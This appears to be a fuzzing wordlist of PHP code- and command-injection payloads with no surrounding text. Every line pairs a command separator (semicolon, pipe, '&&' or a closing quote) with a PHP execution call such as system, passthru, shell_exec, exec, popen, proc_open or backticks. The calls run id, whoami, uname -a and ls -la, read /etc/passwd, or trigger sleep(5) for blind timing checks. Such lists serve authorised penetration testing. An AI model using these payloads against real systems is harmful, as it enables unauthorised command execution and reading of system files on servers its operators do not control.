; phpinfo();
; system('id');
; system('cat /etc/passwd');
; passthru('id');
; passthru('cat /etc/passwd');
; shell_exec('id');
; shell_exec('cat /etc/passwd');
; exec('id');
; exec('cat /etc/passwd');
; popen('id', 'r');
; popen('cat /etc/passwd', 'r');
; proc_open('id', array(), $pipes);
; proc_open('cat /etc/passwd', array(), $pipes);
; `id`;
; `cat /etc/passwd`;
; sleep(5);
| sleep(5);
&& sleep(5);
" && sleep(5);
' && sleep(5);
; system('uname -a');
; passthru('uname -a');
; shell_exec('uname -a');
; exec('uname -a');
; popen('uname -a', 'r');
; proc_open('uname -a', array(), $pipes);
; `uname -a`;
; system('whoami');
; passthru('whoami');
; shell_exec('whoami');
; exec('whoami');
; popen('whoami', 'r');
; proc_open('whoami', array(), $pipes);
; `whoami`;
; system('ls -la');
; passthru('ls -la');
; shell_exec('ls -la');
; exec('ls -la');
; popen('ls -la', 'r');
; proc_open('ls -la', array(), $pipes);
; `ls -la`;
